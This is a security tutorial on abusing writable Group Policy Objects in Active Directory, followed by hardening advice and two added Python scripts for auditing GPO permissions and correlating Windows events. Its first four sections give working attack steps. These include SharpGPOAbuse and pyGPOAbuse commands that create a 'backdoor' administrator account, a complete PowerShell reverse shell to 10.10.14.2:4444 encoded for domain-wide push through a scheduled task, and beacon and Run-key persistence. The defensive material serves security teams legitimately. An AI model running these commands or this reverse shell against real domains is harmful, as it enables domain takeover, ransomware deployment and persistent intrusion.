
Introduction:
Group Policy Objects (GPOs) are the backbone of centralized configuration management in Active Directory (AD), controlling everything from security settings to software deployment. However, when misconfigured, writable GPOs become a prime attack vector, allowing adversaries to escalate privileges to Domain Admin, deploy ransomware domain-wide, or establish persistent backdoors. This article dissects the GPO abuse technique—used by red teams and real attackers alike—and provides hands-on commands for both exploitation and defense.
Learning Objectives:
- Identify writable GPOs using BloodHound and SharpHound collection.
- Abuse vulnerable GPOs with SharpGPOAbuse and pyGPOAbuse to gain SYSTEM-level command execution.
- Implement detection and hardening measures to prevent GPO-based domain takeovers.
You Should Know:
1. Identifying Writable GPOs with BloodHound
BloodHound maps attack paths in AD. To find GPOs that a controlled user can modify, we first collect data using SharpHound (Windows) or BloodHound.py (Linux).
Step‑by‑step guide (Windows):
- Download SharpHound from the BloodHound GitHub repository.
- Run as non‑admin:
.\SharpHound.exe -c All --outputdirectory C:\BH
- Import the resulting zip file into BloodHound (neo4j + bloodhound GUI).
- In BloodHound, run the custom query:
MATCH (u:User {name: 'DOMAIN\youruser'})-[:WriteGpo]->(g:GPO) RETURN u.name, g.name
- Alternatively, use the built‑in edge “WriteGPO” from a user node.
Step‑by‑step guide (Linux):
Install bloodhound.py:
pip install bloodhound
Collect data (requires domain credentials):
bloodhound-python -d lab.local -u low_user -p Pass123 -ns 192.168.1.10 -c all
Upload the JSON files to BloodHound. Look for “FirstDegreeGPOAbuse” edges.
Why this matters: Attackers prioritize GPOs linked to high‑impact OUs (e.g., Domain Controllers, Servers). A single writable GPO can push malicious configurations to thousands of machines.
2. Abusing GPO with SharpGPOAbuse
SharpGPOAbuse is a C# tool that modifies existing GPOs to add a user to the local Administrators group, create scheduled tasks, or run arbitrary commands.
Step‑by‑step guide:
- Compile SharpGPOAbuse (or download a pre‑compiled binary).
- Run from a Windows machine as a user who has WriteGpo rights on a target GPO:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount victimuser --GPOName "Vulnerable GPO"
- Force immediate update on a target machine:
Invoke-GPUpdate -TargetComputer "TARGET-PC" -Force
- Alternatively, add a scheduled task that runs every hour:
SharpGPOAbuse.exe --AddScheduledTask --TaskName "UpdateChecker" --Command "C:\Windows\System32\calc.exe" --GPOName "Vulnerable GPO"
For Linux attackers using pyGPOAbuse, clone and run:
git clone https://github.com/ShellWrecker/pyGPOAbuse
cd pyGPOAbuse
python3 pygpoabuse.py -u low_user -p Pass123 -d lab.local --gpo-name "Vulnerable GPO" --command "net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add"
This tool talks directly to LDAP and SMB, so no Windows binary is required.
3. Deploying Malicious Payloads via GPO
Once you control a GPO, you can force domain‑wide execution of any script. Common payloads include reverse shells, Mimikatz, or Cobalt Strike beacons.
Step‑by‑step guide using native Windows tools (no third‑party binaries):
- Open `Group Policy Management Console` (GPMC).
- Right‑click the vulnerable GPO → Edit.
- Navigate to Computer Configuration → Preferences → Control Panel Settings → Scheduled Tasks.
- Create a new Scheduled Task (immediate, run as SYSTEM).
- Action: Start a program → `cmd.exe` with arguments `/c powershell -enc <Base64 reverse shell>`.
- Alternatively, modify `Computer Configuration → Windows Settings → Scripts → Startup` to run a malicious script from an SMB share.
Command to encode a PowerShell reverse shell:
$Text = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.2",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$Encoded = [Convert]::ToBase64String($Bytes)
Write-Output $Encoded
Push the encoded command via GPO scheduled task. On the next refresh (up to 90 minutes, or use gpupdate /force), all computers in the linked OU get shells.
4. Persistence via Scheduled Tasks
Attackers often use GPO to plant persistent scheduled tasks that survive reboots and reimages.
Step‑by‑step with SharpGPOAbuse:
Every hour, run a beacon:
SharpGPOAbuse.exe --AddScheduledTask --TaskName "WindowsUpdateService" --Command "C:\tools\beacon.exe" --Arguments "--server 10.10.14.2" --GPOName "Vulnerable GPO"
Manual method via GPMC (defender perspective):
- In GPO Editor, go to Computer Configuration → Preferences → Control Panel Settings → Scheduled Tasks.
- New → Scheduled Task (Windows 10+).
- Set trigger: `At startup` and repeat every 5 minutes indefinitely.
- Action: Run `%windir%\System32\reg.exe` with the arguments:
add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\payload.exe"
- Apply to the GPO and link to high‑value OUs.
Detection note: Monitor Event ID 4698 (scheduled task created) and 5136 (GPO modification). 4698 is written to the security log of the machine on which the task is created, so endpoint logs must be collected centrally; 5136 comes from the domain controller and only appears when the “Audit Directory Service Changes” subcategory is enabled and the GPO container carries an audit SACL.
5. Mitigation Strategies: Locking Down GPOs
Prevent GPO abuse by applying least privilege and auditing.
Step‑by‑step hardening:
- Find all users/groups with WriteGPO permissions (as Domain Admin, using the PowerShell ActiveDirectory module):
Get-ADObject -LDAPFilter "(&(objectClass=groupPolicyContainer)(!(name={})))" | ForEach-Object {
    $acl = Get-ADObject -Identity $_.DistinguishedName -Properties nTSecurityDescriptor
    $acl.nTSecurityDescriptor.Access | Where-Object { $_.ActiveDirectoryRights -match "WriteProperty" }
}
- Remove WriteGPO from all non‑administrators (Set-GPPermission requires -TargetType):
Set-GPPermission -Name "Default Domain Policy" -TargetName "Domain Users" -TargetType Group -PermissionLevel None
- Enable advanced audit policies:
- GPO → Computer Config → Policies → Windows Settings → Security Settings → Advanced Audit Policy → Audit GPO Changes (Success and Failure).
- Deploy PowerShell logging and Script Block logging to capture `SharpGPOAbuse` or `pyGPOAbuse` usage.
Linux command to detect misconfigurations from a management host:
Using ldapsearch to list GPOs with their security descriptor (which carries the owner and DACL):
ldapsearch -H ldap://dc.lab.local -D "cn=readonly,dc=lab,dc=local" -w pass -b "dc=lab,dc=local" "(&(objectClass=groupPolicyContainer))" cn nTSecurityDescriptor
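The BloodHound hunt in section 1 and the ACL review in this section answer the same question: which principals can change a GPO. The script below is an added example (not from the article, BloodHound, SharpGPOAbuse or any other tool named here) that answers it offline from SDDL strings, such as the ones the ActiveDirectory module exposes through nTSecurityDescriptor.Sddl. The sample DACL, the helpdesk group SID and the allowlist are constructed for the demonstration. It inspects only the AD object's DACL; the GPO's SYSVOL folder has its own NTFS ACL that needs a separate review.

```python
"""Audit GPO DACLs (SDDL form) for write-capable ACEs held by non-admin trustees.

Added example; it is not from the article or the tools it names. Input is the
SDDL string of a groupPolicyContainer's nTSecurityDescriptor, e.g. exported with
(Get-ADObject -Identity $dn -Properties nTSecurityDescriptor).nTSecurityDescriptor.Sddl
"""
import re

# SDDL rights abbreviations that allow changing the GPO object itself
WRITE_ABBREVS = {"GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "WP": "WRITE_PROPERTY",
                 "WD": "WRITE_DAC", "WO": "WRITE_OWNER"}
# The same rights as access-mask bits, for ACEs written with a hex mask
WRITE_MASK_BITS = {0x10000000: "GENERIC_ALL", 0x40000000: "GENERIC_WRITE",
                   0x00000020: "WRITE_PROPERTY", 0x00040000: "WRITE_DAC", 0x00080000: "WRITE_OWNER"}
# Trustees that legitimately hold write rights on every GPO (SDDL aliases and well-known SIDs)
ADMIN_TRUSTEES = {"DA", "EA", "SY", "BA", "CO", "S-1-5-18", "S-1-5-32-544"}
ADMIN_RID_SUFFIXES = ("-512", "-519")  # Domain Admins, Enterprise Admins RIDs

DACL_RE = re.compile(r"D:(?:P|AI|AR)*((?:\([^)]*\))+)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl):
    """Split the D: section into (type, flags, rights, object_guid, inherit_guid, trustee) tuples.
    Conditional ACEs with nested parentheses are not handled."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        parts = body.split(";")
        if len(parts) >= 6:
            aces.append(tuple(parts[:6]))
    return aces


def write_rights(rights):
    """Return the set of write-capable rights an ACE rights field grants (abbreviations or hex mask)."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for bit, name in WRITE_MASK_BITS.items() if mask & bit}
    granted = set()
    for i in range(0, len(rights) - 1, 2):
        name = WRITE_ABBREVS.get(rights[i:i + 2])
        if name:
            granted.add(name)
    return granted


def is_admin_trustee(trustee):
    return trustee in ADMIN_TRUSTEES or trustee.endswith(ADMIN_RID_SUFFIXES)


def find_writable_aces(sddl, allowlist=frozenset()):
    """List allow-ACEs that give a non-admin, non-allow-listed trustee write rights on the GPO object."""
    findings = []
    for ace_type, flags, rights, obj_guid, _inh_guid, trustee in parse_dacl(sddl):
        if ace_type not in ("A", "OA"):          # deny and audit ACEs do not grant anything
            continue
        if is_admin_trustee(trustee) or trustee in allowlist:
            continue
        granted = write_rights(rights)
        if not granted:
            continue
        flag_set = {flags[i:i + 2] for i in range(0, len(flags), 2)}
        findings.append({
            "trustee": trustee,
            "rights": sorted(granted),
            # an object ACE with a GUID limits WP to one attribute; unscoped WP covers the whole object
            "scoped_to_attribute": ace_type == "OA" and obj_guid != "",
            "inherited": "ID" in flag_set,
        })
    return findings


# Constructed sample: default-style GPO DACL plus one GenericWrite delegation to a
# helpdesk group (SID invented for the example) that should not be able to edit policy.
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;CI;RPWPCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;CI;RPWPCCDCLCLORCWOWDSDDTSW;;;EA)"
    "(A;CI;RPWPCCDCLCLORCWOWDSDDTSW;;;SY)"
    "(A;CI;RPLCLORC;;;AU)"
    "(A;CI;RPLCLORC;;;ED)"
    "(A;CI;GW;;;S-1-5-21-1111-2222-3333-1105)"
)

if __name__ == "__main__":
    for finding in find_writable_aces(SAMPLE_SDDL):
        print(finding)
```

Run it against every GPO's SDDL and treat each finding as a delegation to justify or remove with Set-GPPermission; principals that are meant to edit policy go into the allowlist so the report only shows surprises.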
6. Detection and Incident Response
Rapidly respond to GPO abuse with these forensic commands.
Step‑by‑step detection:
- Check for newly added scheduled tasks across the domain:
Get-WinEvent -ComputerName DC1 -FilterHashtable @{LogName='Security';ID=4698} | Where-Object {$_.Message -like "*GPO*"}
- Find GPOs modified in the last 24 hours:
Get-GPO -All | Where-Object { $_.ModificationTime -gt (Get-Date).AddDays(-1) }
- Query the registry for GPO script assignments:
reg query "\\TARGET-PC\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts" /s
- Linux alternative using enum4linux:
enum4linux -G -S 192.168.1.10 | grep -i "gpo"
- Disable a malicious GPO immediately (-LinkEnabled No disables the link; -Enforced No would only drop enforcement while the link keeps applying):
Set-GPLink -Name "Malicious GPO" -Target "OU=Workstations,DC=lab,DC=local" -LinkEnabled No
Get-GPO -Name "Malicious GPO" | Set-GPRegistryValue -Key "HKLM\Software\Policies\Microsoft\Windows\System" -ValueName "DisableCMD" -Type DWord -Value 1
This turns the attacker’s own weapon against them by disabling command execution via the compromised GPO.
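The detection note in section 4 and the forensic commands in this section both rest on Event IDs 5136 and 4698. The script below is an added example, not from the article, of how those two event types can be correlated once the logs sit in a SIEM or an export: a 5136 that rewrites a groupPolicyContainer's content attributes by someone outside the GPO-editor allowlist, followed by the same scheduled task appearing on several hosts inside the policy refresh window. Field names follow the Windows Security log; the GPO DN (a labelled placeholder), host names, user names and timestamps are constructed.

```python
"""Correlate GPO edits (Event 5136) with scheduled-task fan-out (Event 4698).

Added example; not from the article. Events are modelled as dicts keyed by the
field names of the Windows Security log; the sample records below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import xml.etree.ElementTree as ET

# Attributes rewritten whenever a GPO's content changes
GPO_CONTENT_ATTRS = {"versionNumber", "gPCMachineExtensionNames",
                     "gPCUserExtensionNames", "gPCFileSysPath"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def gpo_modifications(events, allowed_editors):
    """5136 events that changed a groupPolicyContainer by someone outside the GPO-editor allowlist."""
    allowed = {u.lower() for u in allowed_editors}
    hits = []
    for e in events:
        if e["EventID"] != 5136 or e["ObjectClass"] != "groupPolicyContainer":
            continue
        if e["AttributeLDAPDisplayName"] not in GPO_CONTENT_ATTRS:
            continue
        if e["SubjectUserName"].lower() in allowed:
            continue
        hits.append({"time": e["TimeCreated"], "gpo": e["ObjectDN"],
                     "attribute": e["AttributeLDAPDisplayName"], "by": e["SubjectUserName"]})
    return hits


def task_command(task_content):
    """Extract <Exec><Command>/<Arguments> from the TaskContent XML carried in a 4698 event."""
    root = ET.fromstring(task_content)
    cmd = root.find(".//t:Exec/t:Command", TASK_NS)
    args = root.find(".//t:Exec/t:Arguments", TASK_NS)
    return ((cmd.text or "") if cmd is not None else "",
            (args.text or "") if args is not None else "")


def task_fanout(events, gpo_hits, window_minutes=120, min_hosts=3):
    """Tasks of one name created on >= min_hosts distinct hosts within the window after a flagged GPO edit.
    A policy refresh spreads the same task across the linked OU; that burst is the pattern matched here."""
    by_task = defaultdict(list)
    for e in events:
        if e["EventID"] == 4698:
            by_task[e["TaskName"]].append(e)
    findings = []
    for hit in gpo_hits:
        start = _ts(hit["time"])
        end = start + timedelta(minutes=window_minutes)
        for name, evs in by_task.items():
            in_window = [e for e in evs if start <= _ts(e["TimeCreated"]) <= end]
            hosts = {e["Computer"] for e in in_window}
            if len(hosts) >= min_hosts:
                cmd, args = task_command(in_window[0]["TaskContent"])
                findings.append({"gpo": hit["gpo"], "edited_by": hit["by"], "task": name,
                                 "hosts": sorted(hosts), "command": (cmd + " " + args).strip()})
    return findings


# ---- constructed sample data (placeholder GPO GUID, invented hosts and users) ----
GPO_DN = "CN={PLACEHOLDER-GPO-GUID},CN=Policies,CN=System,DC=lab,DC=local"
TASK_XML = ('<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Actions><Exec>'
            '<Command>cmd.exe</Command>'
            '<Arguments>/c \\\\lab.local\\SYSVOL\\lab.local\\scripts\\update.cmd</Arguments>'
            '</Exec></Actions></Task>')


def _ev5136(t, who, attr):
    return {"EventID": 5136, "TimeCreated": t, "Computer": "DC1.lab.local", "SubjectUserName": who,
            "ObjectDN": GPO_DN, "ObjectClass": "groupPolicyContainer", "AttributeLDAPDisplayName": attr}


def _ev4698(t, host, name):
    return {"EventID": 4698, "TimeCreated": t, "Computer": host,
            "SubjectUserName": host.split(".")[0] + "$", "TaskName": name, "TaskContent": TASK_XML}


EVENTS = [
    _ev5136("2024-05-01T08:00:00", "gpoadmin", "versionNumber"),   # routine edit by an allowed editor
    _ev4698("2024-05-01T07:00:00", "WS01.lab.local", "\\Backup"),  # unrelated single-host task
    _ev5136("2024-05-01T10:00:00", "jdoe", "versionNumber"),       # edit by a non-admin user
    _ev4698("2024-05-01T10:12:00", "WS01.lab.local", "\\UpdateChecker"),
    _ev4698("2024-05-01T10:25:00", "WS02.lab.local", "\\UpdateChecker"),
    _ev4698("2024-05-01T11:03:00", "WS03.lab.local", "\\UpdateChecker"),
]

if __name__ == "__main__":
    flagged = gpo_modifications(EVENTS, {"gpoadmin"})
    for finding in task_fanout(EVENTS, flagged):
        print(finding)
```

The 120-minute window matches the default background refresh interval plus its random offset; shorten it when gpupdate /force is suspected, and tune min_hosts to the size of the OU so a task legitimately pushed to a handful of servers does not page anyone.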
What Undercode Say:
- Attackers don’t need zero‑days: GPO abuse relies on misconfigured delegation—a common issue in many enterprises. BloodHound reveals these paths in minutes.
- Defense is not just about patching: Hardening AD means strict ACLs on GPOs, monitoring Event ID 5136, and using tools like ADACLScanner or PingCastle to pre‑emptively find writable GPOs.
Analysis: While many red team articles stop at adding a local admin, real adversaries use GPO abuse to deploy ransomware, credential harvesters, or even alter Windows Defender exclusions domain‑wide. The technique is especially dangerous because GPO changes blend into normal administrative activity. Detection requires baseline knowledge of legitimate GPO edit activity; otherwise, a single modified policy can compromise an entire forest.
Prediction:
As Microsoft pushes more security defaults (like the upcoming “GPO Audit Mode”) and as organizations migrate partially to Intune, attackers will shift to hybrid GPO/Intune abuse. Expect to see cross‑cloud persistence where a compromised on‑prem GPO writes a malicious configuration into Entra ID (Azure AD) synchronization settings. Defenders will need unified policy monitoring across both environments—something most blue teams are not yet equipped to handle.
Reported By: Anubhav Sharma – Hackers Feeds